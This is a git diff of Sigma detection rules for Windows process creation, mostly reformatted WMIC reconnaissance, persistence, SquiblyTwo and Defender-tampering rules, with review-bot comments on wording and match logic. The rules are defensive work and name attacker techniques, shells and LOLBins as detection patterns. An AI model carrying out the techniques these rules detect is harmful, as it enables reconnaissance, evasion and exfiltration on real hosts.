NewProcessName|endswith: - \cmd.exe - \sh.exe - \bash.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml b/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml index 6f9bbee16..28e8e135d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winzip_password_compression.yml 
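Review bot: The reflowed description still reads `Detects remote PowerShell sections`; it should say `sessions`. While it is being touched, spelling the host process as `wsmprovhost.exe` in the description would match the two `endswith: \wsmprovhost.exe` selections in the detection block.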
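Review bot: The description of the WinRM child-process rule keeps the typo `spawnd`; since the line is rewritten anyway, `Detects suspicious processes, including shells, spawned by the WinRM host process (wsmprovhost.exe)` reads cleanly and names the parent the selection actually keys on. The rule has no `references:` entry between `description:` and `author:`, unlike its neighbours; if a source for the shell list exists it is worth adding.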
@@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With WINZIP id: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_winzip: - CommandLine|contains: + CommandLine|contains: - winzip.exe - winzip64.exe selection_password: - CommandLine|contains: -s" + CommandLine|contains: -s" selection_other: - CommandLine|contains: + CommandLine|contains: - ' -min ' - ' -a ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml index 861e99d6d..c4a3e116b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml 
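Review bot: `selection_winzip` identifies the archiver only through the `CommandLine` text `winzip.exe` / `winzip64.exe`, unlike the sibling WinRAR rules in this set which key on `NewProcessName`; a renamed binary evades it, and any process whose arguments merely mention winzip.exe (an installer, a copy command) is pulled in. The Atomic test in the references launches `winzip64.exe` directly, so adding a `NewProcessName|endswith` alternative costs nothing and keeps the existing command-line match for launches through an intermediate. The `-s"` match also presumes a quoted password; if WinZip accepts an unquoted `-spassword` form (not verified here) that variant is missed and deserves a comment.

```yaml
selection_winzip:
    - NewProcessName|endswith:
        - \winzip.exe
        - \winzip64.exe
    - CommandLine|contains:
        - winzip.exe
        - winzip64.exe
# … unchanged: selection_password, selection_other, condition …
```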
@@ -21,10 +21,10 @@ detection: selection: ParentProcessName|endswith: \EdgeTransport.exe filter_conhost: - NewProcessName: C:\Windows\System32\conhost.exe - filter_oleconverter: - NewProcessName|startswith: C:\Program Files\Microsoft\Exchange Server\ - NewProcessName|endswith: \Bin\OleConverter.exe + NewProcessName: C:\Windows\System32\conhost.exe + filter_oleconverter: # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18 + NewProcessName|startswith: C:\Program Files\Microsoft\Exchange Server\ + NewProcessName|endswith: \Bin\OleConverter.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml b/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml index 2a60d9dab..9f90e790d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml @@ -19,13 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName: C:\WINDOWS\system32\wbem\scrcons.exe + NewProcessName: C:\WINDOWS\system32\wbem\scrcons.exe ParentProcessName: C:\Windows\System32\svchost.exe condition: process_creation and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml index 1ed306368..980f701c9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml @@ -1,8 +1,7 @@ title: New ActiveScriptEventConsumer Created Via Wmic.EXE id: ebef4391-1a81-4761-a40a-1db446c0e625 status: test -description: Detects WMIC executions in which an event consumer gets created. This - could be used to establish persistence +description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence references: - https://twitter.com/johnlatwc/status/1408062131321270282?s=12 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ActiveScriptEventConsumer - ' CREATE ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml index b484f0d03..b4321fc16 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml 
@@ -1,8 +1,7 @@ title: Potential Windows Defender Tampering Via Wmic.EXE id: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a status: test -description: Detects potential tampering with Windows Defender settings such as adding - exclusion using wmic +description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender + CommandLine|contains: /Namespace:\\\\root\\Microsoft\\Windows\\Defender condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml index 07361dfa8..085ac6cc9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_process_creation.yml 
@@ -1,11 +1,10 @@ title: New Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d related: - - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 - type: derived + - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation + type: derived status: test -description: Detects new process creation using WMIC via the "process call create" - flag +description: Detects new process creation using WMIC via the "process call create" flag references: - https://www.sans.org/blog/wmic-for-incident-response/ - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - call - create diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml index 04a71d3f4..555edd508 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml 
@@ -1,8 +1,7 @@ title: Computer System Reconnaissance Via Wmic.EXE id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: test -description: Detects execution of wmic utility with the "computersystem" flag in order - to obtain information about the machine such as the domain, username, model, etc. +description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: computersystem + CommandLine|contains: computersystem condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml index 7fce34a46..13e220985 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml @@ -1,8 +1,7 @@ title: Hardware Model Reconnaissance Via Wmic.EXE id: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d status: test -description: Detects the execution of WMIC with the "csproduct" which is used to obtain - information such as hardware models and vendor information +description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information references: - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/ - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks 
@@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: csproduct + CommandLine|contains: csproduct condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml index 80259b4e2..9929fc899 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml @@ -1,17 +1,11 @@ title: Local Groups Reconnaissance Via Wmic.EXE id: 164eda96-11b2-430b-85ff-6a265c15bf32 status: test -description: 'Detects the execution of "wmic" with the "group" flag. - +description: | + Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 
@@ -28,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: ' group' + CommandLine|contains: ' group' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml index 0b6f97677..3bccbce7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml @@ -1,9 +1,7 @@ title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE id: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 status: test -description: Detects the execution of wmic with the "qfe" flag in order to obtain - information about installed hotfix updates on the system. This is often used by - pentester and attacker enumeration scripts +description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts references: - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains: ' qfe' + CommandLine|contains: ' qfe' condition: process_creation and (all of selection*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml index a33ec3149..b327c07fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml @@ -1,9 +1,7 @@ title: Process Reconnaissance Via Wmic.EXE id: 221b251a-357a-49a9-920a-271802777cc0 status: test -description: Detects the execution of "wmic" with the "process" flag, which adversary - might use to list processes running on the compromised host or list installed - software hotfixes and patches. +description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -21,12 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: process + CommandLine|contains: process filter_main_creation: - CommandLine|contains|all: + CommandLine|contains|all: + # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}` - call - create condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml index b436c9b6e..16a91ad87 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml 
@@ -1,8 +1,7 @@ title: Potential Product Reconnaissance Via Wmic.EXE id: 15434e33-5027-4914-88d5-3d4145ec25a9 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://thedfirreport.com/2023/03/06/2022-year-in-review/ - https://www.yeahhub.com/list-installed-programs-version-path-windows/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: Product + CommandLine|contains: Product condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml index cc0d52e63..d97915d47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml @@ -1,8 +1,7 @@ title: Potential Product Class Reconnaissance Via Wmic.EXE id: e568650b-5dcd-4658-8f34-ded0b1e13992 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 
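Review bot: The description of this rule (`15434e33`) is a copy of the product-class rule's — "list of firewall and antivirus products" — but its `selection_cli` only requires the substring `Product`, so it fires on `wmic product get name`, `wmic csproduct` and anything else containing the word, not on the AV/firewall classes that the sibling `e568650b` matches via `AntiVirusProduct`/`FirewallProduct`. The description should state what the detection actually does, e.g. `Detects the execution of WMIC with the 'product' class in order to enumerate installed software products`, which is what the yeahhub reference describes. Note also that, with the usual case-insensitive `contains`, `csproduct` contains `Product`, so every hit of the csproduct rule (`3e3ceccd`) is duplicated here; a `related:` entry or a falsepositives line would make that overlap explicit.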
@@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - AntiVirusProduct - FirewallProduct condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml index 873873979..0cbaa7e87 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml 
@@ -1,22 +1,14 @@ title: Service Reconnaissance Via Wmic.EXE id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae related: - - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 - type: similar + - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 + type: similar status: test -description: 'An adversary might use WMI to check if a certain remote service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain remote service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -33,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: service + CommandLine|contains: service condition: process_creation and (all of selection_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml index be923913f..996b9e7aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml @@ -1,20 +1,14 @@ title: Uncommon System Information Discovery Via Wmic.EXE id: 9d5a1274-922a-49d0-87f3-8c653483b909 related: - - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e - type: derived + - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; - and baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. - Some of these commands were used by Aurora Stealer in late 2022/early 2023. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ 
@@ -36,11 +30,11 @@ detection: EventID: 4688 Channel: Security selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_commands: - CommandLine|contains: + CommandLine|contains: - LOGICALDISK get Name,Size,FreeSpace - os get Caption,OSArchitecture,Version condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml index e8313186d..5850d69d9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml @@ -1,13 +1,12 @@ title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE id: 68bcd73b-37ef-49cb-95fc-edc809730be6 related: - - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b - type: similar - - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae - type: similar + - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant + type: similar + - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae + type: similar status: experimental -description: Detects known WMI recon method to look for unquoted service paths using - wmic. Often used by pentester and attacker enumeration scripts +description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 
@@ -26,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service get ' - name,displayname,pathname,startmode condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml index cf218f37d..f2d573ff5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml @@ -1,10 +1,10 @@ title: WMIC Remote Command Execution id: 7773b877-5abb-4a3e-b9c9-fd0369b59b00 related: - - id: e42af9df-d90b-4306-b7fb-05c863847ebd - type: obsoletes - - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf - type: obsoletes + - id: e42af9df-d90b-4306-b7fb-05c863847ebd + type: obsoletes + - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf + type: obsoletes status: test description: Detects the execution of WMIC to query information on a remote system references: @@ -23,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: '/node:' + CommandLine|contains: '/node:' filter_localhost: - CommandLine|contains: + CommandLine|contains: - '/node:127.0.0.1 ' - '/node:localhost ' condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml index bb14250a5..9b42cfbff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service ' - ' call ' - CommandLine|contains: + CommandLine|contains: - stopservice - startservice condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml index 5bc3d049e..3d2e92853 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml @@ -1,11 +1,10 @@ title: Potential SquiblyTwo Technique Execution id: 8d63dadf-b91b-4187-87b6-34a1114577ea status: test -description: Detects potential SquiblyTwo attack technique with possible renamed WMIC - via Imphash and OriginalFileName fields +description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields references: - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html - - https://twitter.com/mattifestation/status/986280382042595328 + - https://twitter.com/mattifestation/status/986280382042595328 # Deleted - https://atomicredteam.io/defense-evasion/T1220/ - https://lolbas-project.github.io/lolbas/Binaries/Wmic/ author: Markus Neis, Florian Roth 
@@ -26,18 +25,18 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe - - Imphash: - - 1B1A3F43BF37B5BFE60751F2EE2F326E - - 37777A96245A3C74EB217308F3546F4C - - 9D87C9D67CE724033C0B40CC4CA1B206 - - Hashes|contains: - - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E - - IMPHASH=37777A96245A3C74EB217308F3546F4C - - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe + - Imphash: + - 1B1A3F43BF37B5BFE60751F2EE2F326E + - 37777A96245A3C74EB217308F3546F4C + - 9D87C9D67CE724033C0B40CC4CA1B206 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E + - IMPHASH=37777A96245A3C74EB217308F3546F4C + - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'format:' - http condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml index 464f0afe8..4517894f0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml 
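Review bot: The new comment `# Sysmon field hashes contains all types` on `Hashes|contains` describes a Sysmon field, but this rule's logsource context is `EventID: 4688` on the `Security` channel, where as far as I know neither `Imphash` nor `Hashes` is populated, so the two hash alternatives in `selection_pe` cannot match and only the `NewProcessName`/`OriginalFileName` alternatives carry the detection. The comment should state that limitation rather than imply the field is available, e.g. `- Hashes|contains: # only populated by sources that log hashes (e.g. Sysmon); inert for Security 4688`. Worth confirming against the builtin conversion tooling before relying on the hash alternatives for renamed-WMIC coverage.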
@@ -1,19 +1,18 @@ title: Suspicious WMIC Execution Via Office Process id: e1693bc8-7168-4eab-8718-cdcaa68a1738 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 - type: obsoletes - - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: derived + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 + type: obsoletes + - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Office application called wmic to proxye execution through a LOLBIN process. - This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -46,14 +45,15 @@ detection: - \wordpad.exe - \wordview.exe selection_wmic_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call - CommandLine|contains: + CommandLine|contains: + # Add more suspicious LOLBINs as you see fit - regsvr32 - rundll32 - msiexec 
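Review bot: The reflowed description in the first hunk keeps the typo `proxye` and the missing article in "break suspicious parent-child chain"; since the commit rewrites that line anyway, it is the right moment to fix the wording: `description: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).`. The added `# Add more suspicious LOLBINs as you see fit` comment in the second hunk sits inside the `CommandLine|contains` list and is fine as is.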
